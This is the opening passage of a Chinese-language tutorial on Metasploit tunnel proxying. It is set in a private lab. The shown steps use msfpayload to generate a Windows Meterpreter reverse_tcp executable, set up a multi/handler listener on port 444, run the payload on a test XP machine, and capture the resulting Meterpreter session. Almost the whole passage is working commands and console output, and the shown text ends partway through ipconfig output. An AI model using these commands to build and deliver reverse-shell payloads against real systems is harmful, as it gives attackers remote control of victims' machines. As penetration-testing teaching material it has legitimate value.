本文将科普下metasploit隧道代理的使用技巧。
0×00 获取meterpreter
1.首先生成可执行文件
root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.101.105 LPORT=444 X > meter.exe
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 281
Options: {"LHOST"=>"192.168.101.105", "LPORT"=>"444"}
2.启动msfconsole,监听反连端口
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console.../
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0]]
+ -- --=[ 1386 exploits - 863 auxiliary - 236 post ]
+ -- --=[ 342 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 444
LPORT => 444
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 0.0.0.0 yes The listen address
LPORT 444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > run
[*] Started reverse handler on 0.0.0.0:444
[*] Starting the payload handler...
3.在xp-test1执行meter.exe,attacker获得 meterperter
msf exploit(handler) > run
[*] Started reverse handler on 0.0.0.0:444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.101.107
[*] Meterpreter session 1 opened (192.168.101.105:444 -> 192.168.101.107:48019) at 2015-01-11 12:49:11 +0800
meterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface